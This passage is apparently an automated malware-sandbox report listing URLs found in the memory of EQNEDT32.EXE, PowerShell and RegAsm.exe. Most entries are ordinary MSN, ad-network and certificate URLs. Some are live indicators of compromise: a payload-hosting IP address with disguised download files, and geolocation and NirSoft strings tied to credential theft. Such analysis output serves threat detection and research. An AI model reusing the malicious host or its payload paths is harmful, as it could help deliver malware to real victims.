                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 28 Aug 2024 04:54:00 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 28 Aug 2024 04:54:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 144Connection: closeX-DNS-Prefetch-Control: offX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Download-Options: noopenX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'none'
                Source: powershell.exe, 0000000D.00000002.511591510.00000000024B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.21
                Source: powershell.exe, 0000000D.00000002.511591510.00000000024B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.21/xampp/nbc/EVRR.txt
                Source: EQNEDT32.EXE, 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIF
                Source: EQNEDT32.EXE, 00000009.00000003.492215861.000000000037F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFTC:
                Source: EQNEDT32.EXE, 00000009.00000003.492215861.0000000000364000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.492251431.000000000036F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFU
                Source: EQNEDT32.EXE, 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFj
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.620697128.0000000000525000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.620761784.0000000000572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 0000000D.00000002.511591510.0000000002B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                Source: powershell.exe, 0000000B.00000002.516053834.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.511591510.0000000002261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.518814994.00000000005E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: RegAsm.exe, 00000012.00000002.518576089.000000000037C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/LK
                Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://www.msn.com/
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                Source: RegAsm.exe, 0000000F.00000002.521695827.0000000000204000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://contextual.media.net/
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                Source: bhv2AF7.tmp.15.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
